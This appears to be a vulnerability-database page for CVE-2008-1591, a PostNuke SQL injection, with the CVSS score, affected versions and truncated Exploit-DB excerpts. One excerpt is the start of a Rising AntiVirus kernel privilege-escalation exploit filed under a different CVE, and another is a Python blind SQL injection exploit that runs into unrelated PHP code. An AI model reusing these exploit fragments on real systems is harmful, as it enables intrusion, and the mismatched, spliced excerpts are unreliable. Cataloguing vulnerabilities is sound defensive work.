CVE-2008-1591
published 2008-03-31CVE-2008-1591: The pnVarPrepForStore function in PostNuke 0.764 and earlier skips input sanitization when magic_quotes_runtime is enabled, which allows remote attackers to…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.3th percentile
The pnVarPrepForStore function in PostNuke 0.764 and earlier skips input sanitization when magic_quotes_runtime is enabled, which allows remote attackers to conduct SQL injection attacks and execute arbitrary SQL commands via input associated with server variables, as demonstrated by the CLIENT_IP HTTP header (HTTP_CLIENT_IP variable).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| postnuke | postnuke | <= 0.764 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Rising AntiVirus 2008/2009/2010 - Local Privilege Escalation
exploitdb·2010-01-28
CVE-2010-1591 Rising AntiVirus 2008/2009/2010 - Local Privilege Escalation
Rising AntiVirus 2008/2009/2010 - Local Privilege Escalation
---
//by Dlrow [email protected]
//restore all ssdt hooks
// Rising0day.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
enum { SystemModuleInformation = 11 };
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
HANDLE g_RsGdiHandle = 0 ;
void __stdcall WriteKVM(PVOID Address , ULONG Value)
{
ULONG ColorValue = Value ;
ULONG btr ;
ULONG ColorBuffer =
Exploit-DB
PostNuke 0.764 - Blind SQL Injection
exploitdb·2008-03-21
CVE-2008-1591 PostNuke 0.764 - Blind SQL Injection
PostNuke 0.764 - Blind SQL Injection
---
#!/usr/bin/python
#=================================================================================================#
# ____ __________ __ ____ __ #
# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #
# | |/ \ | | _(__ __| |___||__| #
# \/\______| \/ \/ #
#=================================================================================================#
# This was a priv8 Exploit #
#=================================================================================================#
# Postnuke $v) {
if (substr($k,0,4) == 'PNSV') {
return false;
}
}
// Kick it
session_start();
// Have to re-write the cache control header to remove no-save, this
// allows downloading of files to disk for application handlers
// adam_baum - no-cache was stopping modules (andro
No writeups or analysis indexed.
2008-03-31
Published